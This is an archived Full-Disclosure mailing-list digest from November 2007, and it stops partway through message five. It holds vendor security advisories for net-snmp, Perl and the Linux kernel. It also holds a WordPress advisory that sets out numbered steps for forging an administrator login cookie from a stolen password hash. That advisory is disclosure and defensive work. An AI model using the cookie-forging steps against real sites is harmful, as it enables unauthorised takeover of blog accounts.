Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

unsubscribe
From: "LT" <lt () mac hush com>
Date: Mon, 26 Nov 2007 18:54:01 +0100



On Tue, 20 Nov 2007 08:54:18 +0100 full-disclosure-
request () lists grok org uk wrote:
Send Full-Disclosure mailing list submissions to
      full-disclosure () lists grok org uk

To subscribe or unsubscribe via the World Wide Web, visit
      https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
      full-disclosure-request () lists grok org uk

You can reach the person managing the list at
      full-disclosure-owner () lists grok org uk

When replying, please edit your Subject line so it is more 
specific
than "Re: Contents of Full-Disclosure digest..."


Note to digest recipients - when replying to digest posts, please 
trim your post appropriately. Thank you.


Today's Topics:

  1. [ MDKSA-2007:225 ] - Updated net-snmp packages fix remote
     denial of service vulnerability (security () mandriva com)
  2. Wordpress Cookie Authentication Vulnerability (Steven J. 
Murdoch)
  3. [ GLSA 200711-28 ] Perl: Buffer overflow (Pierre-Yves Rofes)
  4. [ MDKSA-2007:226 ] - Updated kernel packages fix multiple
     vulnerabilities and bugs (security () mandriva com)
  5. H2HC Materials (Rodrigo Rubira Branco (BSDaemon))
  6. rPSA-2007-0242-1 php5 php5-cgi php5-mysql php5-pear
     php5-pgsql php5-soap php5-xsl (rPath Update Announcements)
  7. Multiple stack-based buffer overflows in dxmsft.dll (Elazar 
Broad)
  8. [ MDKSA-2007:227 ] - Updated poppler packages fix
     vulnerabilities (security () mandriva com)
  9. [ MDKSA-2007:228 ] - Updated cups packages fix
     vulnerabilities (security () mandriva com)
 10. Tha Manual. (rchrafe)
 11. The Call to Reason (rchrafe)
 12. Re: How to become a Computer Security    Professional ? 
(rchrafe)
 13. Re: How to become a Computer Security    Professional ? 
(rchrafe)
 14. Re: How to become a Computer Security    Professional ? 
(rchrafe)
 15. Large Scale MySpace Phishing Attack (Dancho Danchev)
 16. Re: Multiple stack-based buffer overflows in     dxmsft.dll
     (Elazar Broad)
 17. Re: so gay huh? (rchrafe)
 18. Re: so gay huh? (rchrafe)


-------------------------------------------------------------------

---

Message: 1
Date: Mon, 19 Nov 2007 11:12:22 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:225 ] - Updated net-snmp
      packages fix remote denial of service vulnerability
To: full-disclosure () lists grok org uk
Message-ID: <E1IuB6c-0001Xp-Fv () artemis annvix ca>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


__________________________________________________________________
_____

Mandriva Linux Security Advisory                         MDKSA-
2007:225
http://www.mandriva.com/security/

__________________________________________________________________
_____

Package : net-snmp
Date    : November 19, 2007
Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0,
          Multi Network Firewall 2.0

__________________________________________________________________
_____

Problem Description:

The SNMP agent in net-snmp 5.4.1 and earlier allows remote 
attackers to
cause a denial of service (CPU and memory consumption) via a 
GETBULK
request with a large max-repeaters value.

Updated packages fix this issue.

__________________________________________________________________
_____

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5846

__________________________________________________________________
_____

Updated Packages:

Mandriva Linux 2007.0:
83e0d0edc66af5d11b032cf2a7c12054  2007.0/i586/libnet-snmp10-5.3.1-

2.1mdv2007.0.i586.rpm
211db38ffbbefb22f653a18da8e928f5  2007.0/i586/libnet-snmp10-devel-

5.3.1-2.1mdv2007.0.i586.rpm
b43cc33ca2b0fb582e69bbe52578e76a  2007.0/i586/libnet-snmp10-
static-devel-5.3.1-2.1mdv2007.0.i586.rpm
e2ac837cd1eff29bb56f5fa964f59ed5  2007.0/i586/net-snmp-5.3.1-
2.1mdv2007.0.i586.rpm
2434602e5d0a3133318600b4071cf4ea  2007.0/i586/net-snmp-mibs-5.3.1-

2.1mdv2007.0.i586.rpm
d9336d2710c1a44531cdb790cd8f47cf  2007.0/i586/net-snmp-trapd-
5.3.1-2.1mdv2007.0.i586.rpm
a1945889589568b420181a8a196d51ad  2007.0/i586/net-snmp-utils-
5.3.1-2.1mdv2007.0.i586.rpm
cf8fd2357e80a805ab3210fd3a8f8d01  2007.0/i586/perl-NetSNMP-5.3.1-
2.1mdv2007.0.i586.rpm 
da66327183a153d054bbc5d70fde958c  2007.0/SRPMS/net-snmp-5.3.1-
2.1mdv2007.0.src.rpm

Mandriva Linux 2007.0/X86_64:
7a4a25157d9a1e3b9cf4bf7af1205aa8  2007.0/x86_64/lib64net-snmp10-
5.3.1-2.1mdv2007.0.x86_64.rpm
cab6a3e8bc7167656e38e5a429eb8c0a  2007.0/x86_64/lib64net-snmp10-
devel-5.3.1-2.1mdv2007.0.x86_64.rpm
03f09f4fe99c381bda2603861f9644a2  2007.0/x86_64/lib64net-snmp10-
static-devel-5.3.1-2.1mdv2007.0.x86_64.rpm
425489fcb707757a46e0c6105309e2ff  2007.0/x86_64/net-snmp-5.3.1-
2.1mdv2007.0.x86_64.rpm
7df1fa9a564c63687621355561ba9eec  2007.0/x86_64/net-snmp-mibs-
5.3.1-2.1mdv2007.0.x86_64.rpm
fe2aaae5507ae5122a7d30f9fd74eef5  2007.0/x86_64/net-snmp-trapd-
5.3.1-2.1mdv2007.0.x86_64.rpm
ee1ae1d56af4b511b3bb2b1a986aa60a  2007.0/x86_64/net-snmp-utils-
5.3.1-2.1mdv2007.0.x86_64.rpm
04393ea88742f3b05586a555d8ad81ec  2007.0/x86_64/perl-NetSNMP-
5.3.1-2.1mdv2007.0.x86_64.rpm 
da66327183a153d054bbc5d70fde958c  2007.0/SRPMS/net-snmp-5.3.1-
2.1mdv2007.0.src.rpm

Mandriva Linux 2007.1:
fa0f200cd711f97684d9debfdeef3e15  2007.1/i586/libnet-snmp10-5.3.1-

3.1mdv2007.1.i586.rpm
68c25bedfd4370a5fc0aa5ff934a2b1b  2007.1/i586/libnet-snmp10-devel-

5.3.1-3.1mdv2007.1.i586.rpm
ecbd2c76a1ea3595594f10c66bea5772  2007.1/i586/libnet-snmp10-
static-devel-5.3.1-3.1mdv2007.1.i586.rpm
04c676ae1290bbfbd7083252ae5b10dd  2007.1/i586/net-snmp-5.3.1-
3.1mdv2007.1.i586.rpm
2a6c6befd5958c7c9c946d2189d2f128  2007.1/i586/net-snmp-mibs-5.3.1-

3.1mdv2007.1.i586.rpm
5cd1e27c1af30157ead213324c440527  2007.1/i586/net-snmp-trapd-
5.3.1-3.1mdv2007.1.i586.rpm
423682a7f455940da49272647925838e  2007.1/i586/net-snmp-utils-
5.3.1-3.1mdv2007.1.i586.rpm
1ca18897188b7a34d98b146d65746477  2007.1/i586/perl-NetSNMP-5.3.1-
3.1mdv2007.1.i586.rpm 
f2a3a8df265da917384a4c0916b330a6  2007.1/SRPMS/net-snmp-5.3.1-
3.1mdv2007.1.src.rpm

Mandriva Linux 2007.1/X86_64:
9cdea571a84945accd6d38527b1bedb5  2007.1/x86_64/lib64net-snmp10-
5.3.1-3.1mdv2007.1.x86_64.rpm
8352cb8ef1fac035ea009d696e1d5837  2007.1/x86_64/lib64net-snmp10-
devel-5.3.1-3.1mdv2007.1.x86_64.rpm
5e54dd10e2f97bd2ee23f0a715ef734e  2007.1/x86_64/lib64net-snmp10-
static-devel-5.3.1-3.1mdv2007.1.x86_64.rpm
3187463725a5b015d3f507ac4a723160  2007.1/x86_64/net-snmp-5.3.1-
3.1mdv2007.1.x86_64.rpm
638d8c0a5d4be46ee1b9c2640ed7a061  2007.1/x86_64/net-snmp-mibs-
5.3.1-3.1mdv2007.1.x86_64.rpm
c4f41ebf9bf64dfc5236bb935ee16c31  2007.1/x86_64/net-snmp-trapd-
5.3.1-3.1mdv2007.1.x86_64.rpm
734133a9a7a860f90b76c8bd72a0ddd0  2007.1/x86_64/net-snmp-utils-
5.3.1-3.1mdv2007.1.x86_64.rpm
b1f5da81f1c27888df5ba8f71279fb05  2007.1/x86_64/perl-NetSNMP-
5.3.1-3.1mdv2007.1.x86_64.rpm 
f2a3a8df265da917384a4c0916b330a6  2007.1/SRPMS/net-snmp-5.3.1-
3.1mdv2007.1.src.rpm

Corporate 3.0:
748009feee8a9d4d904b7e77537ff791  corporate/3.0/i586/libnet-snmp5-

5.1-7.3.C30mdk.i586.rpm
8ca0b75c8ec8e0839ae37335b04629ab  corporate/3.0/i586/libnet-snmp5-

devel-5.1-7.3.C30mdk.i586.rpm
a0c2d416faa87c016826b5f8616c3af3  corporate/3.0/i586/libnet-snmp5-

static-devel-5.1-7.3.C30mdk.i586.rpm
99659604d3f40d23179b2b3138178e41  corporate/3.0/i586/net-snmp-5.1-

7.3.C30mdk.i586.rpm
3f9e8c99d31dd0dd0d3e5364325370ac  corporate/3.0/i586/net-snmp-
mibs-5.1-7.3.C30mdk.i586.rpm
6bf842fa5664b91062fc74fac450aa90  corporate/3.0/i586/net-snmp-
trapd-5.1-7.3.C30mdk.i586.rpm
ced36508ad4a349cf945d62823b556d5  corporate/3.0/i586/net-snmp-
utils-5.1-7.3.C30mdk.i586.rpm 
d8da239034cf799078cc3df5c5646501  corporate/3.0/SRPMS/net-snmp-
5.1-7.3.C30mdk.src.rpm

Corporate 3.0/X86_64:
d3f097f7389841deb188d7353c5fdf5c  corporate/3.0/x86_64/lib64net-
snmp5-5.1-7.3.C30mdk.x86_64.rpm
b53aea1a27f1c5a1e5515abb31ac70b0  corporate/3.0/x86_64/lib64net-
snmp5-devel-5.1-7.3.C30mdk.x86_64.rpm
a910dfbb95c2dd8fe70ce1c62e743c03  corporate/3.0/x86_64/lib64net-
snmp5-static-devel-5.1-7.3.C30mdk.x86_64.rpm
bfe1ba7a83f9afcacd9273eb6ebbd538  corporate/3.0/x86_64/net-snmp-
5.1-7.3.C30mdk.x86_64.rpm
b6e7b70f0d7549f44850834b2542fb8f  corporate/3.0/x86_64/net-snmp-
mibs-5.1-7.3.C30mdk.x86_64.rpm
a5ab3548c27e86789e41248ab53e4982  corporate/3.0/x86_64/net-snmp-
trapd-5.1-7.3.C30mdk.x86_64.rpm
3c57bfdfa6b4ac44adab12bda0131a2f  corporate/3.0/x86_64/net-snmp-
utils-5.1-7.3.C30mdk.x86_64.rpm 
d8da239034cf799078cc3df5c5646501  corporate/3.0/SRPMS/net-snmp-
5.1-7.3.C30mdk.src.rpm

Corporate 4.0:
0fac46c024f1cb4a8be101e69a942233  corporate/4.0/i586/libnet-snmp5-

5.2.1.2-5.1.20060mlcs4.i586.rpm
857fcac472ce931834cccde0de2741e4  corporate/4.0/i586/libnet-snmp5-

devel-5.2.1.2-5.1.20060mlcs4.i586.rpm
112cceb5d76947959c251ecb1b157a3e  corporate/4.0/i586/libnet-snmp5-

static-devel-5.2.1.2-5.1.20060mlcs4.i586.rpm
ecf0b6386447f6442375cb39c60479cd  corporate/4.0/i586/net-snmp-
5.2.1.2-5.1.20060mlcs4.i586.rpm
72a4fa1c8af3cc00bfbb3d877d5c329a  corporate/4.0/i586/net-snmp-
mibs-5.2.1.2-5.1.20060mlcs4.i586.rpm
ab9ceaa6d9df42f687fe0c6790a2d266  corporate/4.0/i586/net-snmp-
trapd-5.2.1.2-5.1.20060mlcs4.i586.rpm
c66e13b576028690583f0fa2318bee3f  corporate/4.0/i586/net-snmp-
utils-5.2.1.2-5.1.20060mlcs4.i586.rpm
8aeab0a22ec99e5cde40593c883415aa  corporate/4.0/i586/perl-NetSNMP-

5.2.1.2-5.1.20060mlcs4.i586.rpm 
b42c3b00b13c6cc458a0435dd4c7ff71  corporate/4.0/SRPMS/net-snmp-
5.2.1.2-5.1.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
3bb05138c10885baa4db145f2ae6c726  corporate/4.0/x86_64/lib64net-
snmp5-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
2ef53cc96353eefb27abf76bc83bd35f  corporate/4.0/x86_64/lib64net-
snmp5-devel-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
14ce1bda23212a415cbdcc43b46813c2  corporate/4.0/x86_64/lib64net-
snmp5-static-devel-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
f6e393154ee66701b8fb5d848aeb3d7e  corporate/4.0/x86_64/net-snmp-
5.2.1.2-5.1.20060mlcs4.x86_64.rpm
77fcaeda03c9bed289ba9a7a6cc1ca48  corporate/4.0/x86_64/net-snmp-
mibs-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
e40ea44f385c0c92961fb11fa4013c02  corporate/4.0/x86_64/net-snmp-
trapd-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
537f8597086053c4d5a56ebd7d35b9e3  corporate/4.0/x86_64/net-snmp-
utils-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
51b4c70346529ba7a88de89543d16040  corporate/4.0/x86_64/perl-
NetSNMP-5.2.1.2-5.1.20060mlcs4.x86_64.rpm 
b42c3b00b13c6cc458a0435dd4c7ff71  corporate/4.0/SRPMS/net-snmp-
5.2.1.2-5.1.20060mlcs4.src.rpm

Multi Network Firewall 2.0:
9210aef172a538942f490c89afb4022b  mnf/2.0/i586/libnet-snmp5-5.1-
7.3.M20mdk.i586.rpm 
844c7d5cb0cec99e3cab16792cb7766e  mnf/2.0/SRPMS/net-snmp-5.1-
7.3.M20mdk.src.rpm

__________________________________________________________________
_____

To upgrade automatically use MandrivaUpdate or urpmi.  The 
verification
of md5 checksums and GPG signatures is performed automatically 
for you.

All packages are signed by Mandriva for security.  You can obtain 

the
GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com

__________________________________________________________________
_____

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
 <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHQaYcmqjQ0CJFipgRAtwPAKDBmKLrILjPOlBxv0HLu3YwQxbjFACfVRZM
+tyjwf62Xh9rba65JnJ1RtU=
=zmEd
-----END PGP SIGNATURE-----



------------------------------

Message: 2
Date: Mon, 19 Nov 2007 18:46:37 +0000
From: "Steven J. Murdoch" <fulldisc+Steven.Murdoch () cl cam ac uk>
Subject: [Full-disclosure] Wordpress Cookie Authentication
      Vulnerability
To: full-disclosure () lists grok org uk
Message-ID: <20071119184637.GJ1043 () tern cl cam ac uk>
Content-Type: text/plain; charset="us-ascii"

Wordpress Cookie Authentication Vulnerability

Original release date: 2007-11-19
Last revised: 2007-11-19
Latest version: 
http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-
auth.txt
CVE ID: <pending>
Source: Steven J. Murdoch <http://www.cl.cam.ac.uk/users/sjm217/>


Systems Affected:

Wordpress 1.5 -- 2.3.1 (including current version, as of 2007-11-
19)


Overview:

With read-only access to the Wordpress database, it is possible 
to
generate a valid login cookie for any account, without resorting 
to a
brute force attack. This allows a limited SQL injection 
vulnerability
to be escalated into administrator access.

This vulnerability is known to be actively exploited, hence the
expedited public release.


I. Description

For authentication, the Wordpress user database stores the MD5 
hash
of login passwords. A client is permitted access if they can 
present a
password whose hash matches the stored one.

$ mysql -u wordpress -p wordpress
  Enter password: ********

  mysql> SELECT ID, user_login, user_pass FROM wp_users;
  +----+-------------+----------------------------------+
  | ID | user_login  | user_pass                        |
  +----+-------------+----------------------------------+
  |  1 | admin       | 4cee2c84f6de6d89a4db4f2894d14e38 |
  ...

Of course, entering your password after each action that requires
authorization would be exceptionally tedious. So, after logging 
in,
Wordpress presents the client with two cookies:

 wordpressuser_6092254072ca971c70b3ff302411aa5f=admin
 
wordpresspass_6092254072ca971c70b3ff302411aa5f=813cadd8658c4776afbe

5de8f304a684

The cookie names contains the MD5 hash (6092...1a5f) of the blog 
URL.
The value of wordpressuser_... is the login name, and the value 
of
wordpresspass is the double-MD5 hash of the user password.

Wordpress will permit access to a given user account if the
wordpressuserpass_... cookie matches the hash of the specified 
user's
wp_users.user_pass database entry.

In other words, the database contains MD5(password) and the 
cookie
contains MD5(MD5(password)). It is thus trivial to convert a 
database
entry into an authentication cookie.

At this point the vulnerability should be clear. If an attacker 
can
gain read access to the wp_user table, for example due to a 
publicly
visible backup or SQL injection vulnerability, a valid cookie can 

be
generated for any account. 

This applies even if the user's password is sufficiently complex 
to
resist brute force and rainbow table attacks. While it should be
computationally infeasible to go backwards from MD5(password) to
password, the attacker needs only to go forwards.

The exploitation steps are therefore:
 1) Find the hash of the blog URL: Either just look at the URL, 
or
    create an account to get a user cookie
 2) Read the user_pass entry from wp_users table: Look for
    backups, perform SQL injection, etc...
 3) Set the following cookies:
     wordpressuser_<MD5(url)>=admin
     wordpresspass_<MD5(url)>=MD5(user_pass)
 4) You have admin access to the blog


II. Impact

A remote attacker, with read access to the password database can 
gain
administrator rights. This may be used in conjunction with an SQL
injection attack, or after locating a database backup.

An attacker who has alternatively compromised the database of one
Wordpress blog can also gain access to any other whose users have 

the
same password on both.


III. Solution

No vendor patch is available.
No timeline for a vendor patch has been announced.

Workarounds:

- Protect the Wordpress database, and do not allow backups to be
  released.
- Keep your Wordpress installation up to date. This should reduce 

the
  risk that your database will be compromised.
- Do not share passwords across different sites.
- If you suspect a database to be compromised, change all 
passwords
  to different ones. It is not adequate to change the passwords 
to
  the same ones, since Wordpress does not "salt" [1] the password
  database.
- Remove write permissions on the Wordpress files for the system
  account that the webserver runs as. This will disable the theme
  editor, but make it more difficult to escalate Wordpress
  administrator access into the capability to execute arbitrary 
code
- Configure the webserver to not execute files in any directory
  writable by the webserver system account (e.g. the upload
  directory).

Potential fixes:

 The problem occurs because it is easy to go from the password 
hash
 in the database to a cookie (i.e the application of MD5 is the 
wrong
 way around). The simplest fix is to store MD5(MD5(password)) in 
the
 database, and make the cookie MD5(password). This still makes it
 infeasible to retrieve the password from a cookie, but means 
that it
 is also infeasible to generate a valid cookie from the database
 entry.

 However, there are other vulnerabilities in the Wordpress cookie 

and
 password handling, which should be resolved too:

 - Passwords are unsalted [2], leaving them open to brute force, 
rainbow
   table and other attacks [3].
 - It is impossible to revoke a cookie without changing the 
user's
   password.
 - Cookies do not contain an expiry time, so are always valid 
(until
   the user's password changes)
 - There ought to be an option to limit cookies to a particular
   IP address or range.


References:

 [1] http://en.wikipedia.org/wiki/Salt_(cryptography)
 [2] http://trac.wordpress.org/ticket/2394
 [3] http://www.lightbluetouchpaper.org/2007/11/16/google-as-a-
password-cracker/


Timeline:

2007-10-29: security () wordpress org notified; no response
2007-11-02: security () wordpress org notified;
            Confirmation of active exploitation requested by 
Wordpress
2007-11-02: Confirmation sent; no response
2007-11-19: Advisory released to full-disclosure and BugTraq

-- 
w: http://www.cl.cam.ac.uk/users/sjm217/
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-
disclosure/attachments/20071119/f87361fa/attachment-0001.bin 

------------------------------

Message: 3
Date: Mon, 19 Nov 2007 22:10:42 +0100
From: Pierre-Yves Rofes <py () gentoo org>
Subject: [Full-disclosure] [ GLSA 200711-28 ] Perl: Buffer 
overflow
To: gentoo-announce () gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
      security-alerts () linuxsecurity com
Message-ID: <4741FBD2.5040609 () gentoo org>
Content-Type: text/plain; charset=ISO-8859-1

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

- - -
Gentoo Linux Security Advisory                           GLSA 
200711-28
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

- - -
                                           
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

- - -

 Severity: Normal
    Title: Perl: Buffer overflow
     Date: November 19, 2007
     Bugs: #198196
       ID: 200711-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

- - -

Synopsis
========

A buffer overflow in the Regular Expression engine in Perl 
possibly
allows for the execution of arbitrary code.

Background
==========

Perl is a stable, cross-platform programming language created by 
Larry
Wall.

Affected packages
=================

   ---------------------------------------------------------------

----
    Package        /  Vulnerable  /                        
Unaffected
   ---------------------------------------------------------------

----
 1  dev-lang/perl     < 5.8.8-r4                          >= 
5.8.8-r4

Description
===========

Tavis Ormandy and Will Drewry (Google Security Team) discovered a
heap-based buffer overflow in the Regular Expression engine 
(regcomp.c)
that occurs when switching from byte to Unicode (UTF-8) characters 

in a
regular expression.

Impact
======

A remote attacker could either entice a user to compile a 
specially
crafted regular expression or actively compile it in case the 
script
accepts remote input of regular expressions, possibly leading to 
the
execution of arbitrary code with the privileges of the user 
running
Perl.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Perl users should upgrade to the latest version:

   # emerge --sync
   # emerge --ask --oneshot --verbose ">=dev-lang/perl-5.8.8-r4"

References
==========

 [ 1 ] CVE-2007-5116
       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-
5116

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 http://security.gentoo.org/glsa/glsa-200711-28.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHQfvSuhJ+ozIKI5gRAvsEAJ4xdMYdYOWV1neFOchsoCtz3sUtGwCggFQg
RVShInUYsQgHfjeb1K1xnE4=
=wi9y
-----END PGP SIGNATURE-----



------------------------------

Message: 4
Date: Mon, 19 Nov 2007 16:41:14 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:226 ] - Updated kernel
      packages fix multiple vulnerabilities and bugs
To: full-disclosure () lists grok org uk
Message-ID: <E1IuGEs-0007rF-PH () artemis annvix ca>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


__________________________________________________________________
_____

Mandriva Linux Security Advisory                         MDKSA-
2007:226
http://www.mandriva.com/security/

__________________________________________________________________
_____

Package : kernel
Date    : November 19, 2007
Affected: 2008.0

__________________________________________________________________
_____

Problem Description:

Some vulnerabilities were discovered and corrected in the Linux
2.6 kernel:

The minix filesystem code allows local users to cause a denial of
service (hang) via a malformed minix file stream (CVE-2006-6058).

An integer underflow in the Linux kernel prior to 2.6.23 allows 
remote
attackers to cause a denial of service (crash) via a crafted SKB 
length
value in a runt IEEE 802.11 frame when the 
IEEE80211_STYPE_QOS_DATA
flag is set (CVE-2007-4997).

To update your kernel, please follow the directions located at:

  http://www.mandriva.com/en/security/kernelupdate

__________________________________________________________________
_____

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6058
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4997

__________________________________________________________________
_____

Updated Packages:

Mandriva Linux 2008.0:
bfb8abfb7532255d239ce8ef3b39966b  2008.0/i586/kernel-2.6.22.9-
2mdv-1-1mdv2008.0.i586.rpm
c68305809aa8704146ea1a59cd687ab1  2008.0/i586/kernel-desktop-
2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
89a439f86bd47820345287275fe25674  2008.0/i586/kernel-desktop-
devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
a13eab853fc0b044456d90d98c8e9008  2008.0/i586/kernel-desktop-
devel-latest-2.6.22.9-2mdv2008.0.i586.rpm
229f00634e286da1ab490678cf201dab  2008.0/i586/kernel-desktop-
latest-2.6.22.9-2mdv2008.0.i586.rpm
e77c3f728f0ba5bf8491e27ef389df8c  2008.0/i586/kernel-desktop586-
2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
82d8110dc838a1a25b2d4de0e94872e3  2008.0/i586/kernel-desktop586-
devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
0be66b6c155ff5888900f784bf21f555  2008.0/i586/kernel-desktop586-
devel-latest-2.6.22.9-2mdv2008.0.i586.rpm
48976bcfb3ecd30b2c2a671e49f2d241  2008.0/i586/kernel-desktop586-
latest-2.6.22.9-2mdv2008.0.i586.rpm
372de082e77dec0e87d93f389bff76cf  2008.0/i586/kernel-doc-2.6.22.9-

2mdv2008.0.i586.rpm
8fb68460352343d0c14b3d2c5581375f  2008.0/i586/kernel-laptop-
2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
0c76031c7eb78ba7da93b83ebf531541  2008.0/i586/kernel-laptop-devel-

2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
059f66f5340e538dda3d748276313975  2008.0/i586/kernel-laptop-devel-

latest-2.6.22.9-2mdv2008.0.i586.rpm
4d6c700c736a476718c809fb3a470ed9  2008.0/i586/kernel-laptop-
latest-2.6.22.9-2mdv2008.0.i586.rpm
57e0382893adc64445913de674815ad5  2008.0/i586/kernel-server-
2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
f2ea96b6c7f83f8de0f27dc1c2ea9193  2008.0/i586/kernel-server-devel-

2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
4de3613951fda9c4c92fcb35fe743a04  2008.0/i586/kernel-server-devel-

latest-2.6.22.9-2mdv2008.0.i586.rpm
4cc8313e4fed4a1a966bc4f4d0819f71  2008.0/i586/kernel-server-
latest-2.6.22.9-2mdv2008.0.i586.rpm
a30a7a388cdcdf089c39f7a7c26e34f0  2008.0/i586/kernel-source-
2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
5b919908b67f94571a4851caf08e8ece  2008.0/i586/kernel-source-
latest-2.6.22.9-2mdv2008.0.i586.rpm 
6e797fd0fea50e2b0290ca082ca9c1db  2008.0/SRPMS/kernel-2.6.22.9-
2mdv2007.0.src.rpm

Mandriva Linux 2008.0/X86_64:
d30b2a76ab4e37f296f07380fa8d41a4  2008.0/x86_64/kernel-2.6.22.9-
2mdv-1-1mdv2008.0.x86_64.rpm
3cdbd2356b7400f831a8b759d13952ec  2008.0/x86_64/kernel-desktop-
2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
a60abdec0274a9f96be2fb1117eb2f4a  2008.0/x86_64/kernel-desktop-
devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
272ac8a552c99a1b72303a92f474d46f  2008.0/x86_64/kernel-desktop-
devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
8c78406bc678b51a4c84526b0874703e  2008.0/x86_64/kernel-desktop-
latest-2.6.22.9-2mdv2008.0.x86_64.rpm
8447a07d292dd930bba13a6d06bf6570  2008.0/x86_64/kernel-doc-
2.6.22.9-2mdv2008.0.x86_64.rpm
546663f7f08a1ed4a0e561c06960872e  2008.0/x86_64/kernel-laptop-
2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
482b6130e1695693ebfd610aade49255  2008.0/x86_64/kernel-laptop-
devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
280678d50696a95f56735ad91fcc92ef  2008.0/x86_64/kernel-laptop-
devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
f4fedb72b7d286f9b9dae772b8251a7a  2008.0/x86_64/kernel-laptop-
latest-2.6.22.9-2mdv2008.0.x86_64.rpm
c811160740d5c4e138430fb757803bcc  2008.0/x86_64/kernel-server-
2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
1078b15d6cb4a1c420e7212d4a7ca545  2008.0/x86_64/kernel-server-
devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
e127a24e39d458865ebc54e61a7db34b  2008.0/x86_64/kernel-server-
devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
347576ae981042a8277c2adcdb433cfc  2008.0/x86_64/kernel-server-
latest-2.6.22.9-2mdv2008.0.x86_64.rpm
464e4b918285dac78af1b2521ebac461  2008.0/x86_64/kernel-source-
2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
affd96915a01aa3927dda61bd1fad19d  2008.0/x86_64/kernel-source-
latest-2.6.22.9-2mdv2008.0.x86_64.rpm 
6e797fd0fea50e2b0290ca082ca9c1db  2008.0/SRPMS/kernel-2.6.22.9-
2mdv2007.0.src.rpm

__________________________________________________________________
_____

To upgrade automatically use MandrivaUpdate or urpmi.  The 
verification
of md5 checksums and GPG signatures is performed automatically 
for you.

All packages are signed by Mandriva for security.  You can obtain 

the
GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com

__________________________________________________________________
_____

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
 <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHQfTKmqjQ0CJFipgRAm4KAJ9vlEIIafxXuBzFtS4lpZ7H98u+OACfeqnj
6pOfo1qywkIBnd5cQnlOdtM=
=qX1m
-----END PGP SIGNATURE-----



------------------------------

Message: 5
Date: Mon, 19 Nov 2007 21:14:15 -0000
From: "Rodrigo Rubira Branco (BSDaemon)" 
<rodrigo () kernelhacking com>
Subject: [Full-disclosure] H2HC Materials
To: full-disclosure () lists grok org uk
Message-ID: <20071119231415.E4DED8BEEB () mail fjaunet com br>
Content-Type: text/plain; charset="iso-8859-1";

For those who have interest in better know about H2HC conference, 
the
presentation materials are now online at
